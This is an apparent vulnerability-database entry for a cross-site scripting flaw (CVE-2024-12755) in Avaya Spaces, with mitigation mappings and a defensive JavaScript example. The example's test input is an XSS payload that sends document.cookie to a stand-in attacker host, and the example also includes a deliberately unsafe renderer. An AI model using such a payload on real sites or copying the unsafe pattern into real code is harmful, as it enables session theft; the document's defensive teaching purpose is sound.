CVE-2024-12755
Published: 11 February 2025
Summary
CVE-2024-12755 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Avaya Spaces. Its CVSS base score is 7.9 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The vulnerability ranks at the 21.4th percentile by exploit likelihood (below the median) and is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2024-12755 is a Cross-Site Scripting (XSS) vulnerability, classified under CWE-79, affecting Avaya Spaces. Published on 2025-02-11, it may allow an attacker to run unauthorized script in another user's browser and, through that, disclose sensitive information. The vulnerability has a CVSS v3.1 base score of 7.9 (AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L).
Reading the vector: the attack is reachable over the network (AV:N), has high attack complexity (AC:H), needs only low privileges such as an ordinary Avaya Spaces account (PR:L), and requires user interaction from the victim (UI:R), as XSS typically does. Scope is changed (S:C) because the injected script executes in the victim's browser rather than inside the vulnerable Avaya Spaces component; the high confidentiality and integrity impacts and the low availability impact are assessed against that victim context. The high attack complexity is what keeps the score at 7.9 rather than higher, so this metric is worth confirming against your own deployment when prioritizing.
Mitigation details are provided in the Avaya advisory at https://support.avaya.com/css/public/documents/101091836.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-51090
Vulnerability details
A Cross-Site Scripting (XSS) vulnerability in Avaya Spaces may have allowed unauthorized code execution and potential disclosure of sensitive information.
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')
Related Threats
MITRE ATT&CK Enterprise Techniques
- Exploit Public-Facing Application (T1190)
Why these techniques?
Stored or reflected XSS in a public-facing web application gives the attacker arbitrary JavaScript execution in the victim's browser context, which is the initial-access vector T1190 describes.
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): directly mitigates this XSS vulnerability in Avaya Spaces by requiring timely identification, prioritization, and remediation of the flaw, in practice applying the fix described in the Avaya advisory.
- SI-10 (Information Input Validation): prevents XSS by validating and sanitizing untrusted user input before it is processed, addressing the root cause of the injection.
- SI-15 (Information Output Filtering): neutralizes XSS payloads by filtering and encoding output sent to users' browsers, blocking script execution and the resulting disclosure of sensitive information.
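The two input/output controls translate directly into code. The following is an added example (not Avaya's code, and not the actual defect in Avaya Spaces, which the advisory does not detail) showing the CWE-79 pattern of concatenating untrusted data into HTML beside a hardened version that applies SI-10 allowlist validation to a fixed-shape field and SI-15 HTML entity encoding at the output sink; the message object, the display-name policy and the foreignTags check helper are constructed for the example.

```javascript
// Added example (not Avaya's code): the CWE-79 pattern next to its hardened form,
// mapping NIST SI-10 (validate input) and SI-15 (encode output) onto actual code.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// SI-15: entity-encode for the HTML element and quoted-attribute contexts only.
// JavaScript, URL and CSS contexts each need their own encoder; do not reuse this there.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// SI-10: allowlist validation for a field whose legitimate shape is known.
// Assumed policy for this example: 1-64 characters from letters, digits, space, dot, dash, apostrophe.
function validateDisplayName(name) {
  return typeof name === 'string' && /^[\p{L}\p{N} .'-]{1,64}$/u.test(name);
}

// Vulnerable pattern: untrusted fields concatenated straight into markup.
// Whatever the attacker places in author or text becomes live HTML in the viewer's browser.
function renderMessageUnsafe(msg) {
  return `<div class="msg"><b>${msg.author}</b>: ${msg.text}</div>`;
}

// Hardened pattern: reject malformed structured fields, encode every field at the output sink.
// Free text (the message body) cannot be allowlisted, so encoding is the control that protects it.
function renderMessageSafe(msg) {
  if (!validateDisplayName(msg.author)) throw new Error('display name rejected by allowlist');
  return `<div class="msg"><b>${escapeHtml(msg.author)}</b>: ${escapeHtml(msg.text)}</div>`;
}

// Check helper: element names present in the markup beyond those the template itself emits.
// A literal '<' from user data shows up here; an encoded '&lt;' does not.
function foreignTags(html, allowed = ['div', 'b']) {
  const found = new Set();
  for (const match of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9-]*)/g)) found.add(match[1].toLowerCase());
  return [...found].filter((tag) => !allowed.includes(tag));
}

// Constructed sample input, not a payload taken from the advisory
const hostileMessage = {
  author: 'mallory',
  text: `<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">`,
};

console.log(foreignTags(renderMessageUnsafe(hostileMessage))); // [ 'img' ]
console.log(foreignTags(renderMessageSafe(hostileMessage)));   // []
```

Note that validation alone would not have saved the unsafe renderer: the hostile text is a legitimate free-text field, so SI-10 cannot reject it, and only the SI-15 encoding at the sink stops the `<img onerror>` from executing. In a real code base the check helper would be replaced by a DOM-based test or a Content Security Policy report, but the division of labour between the two controls is the same.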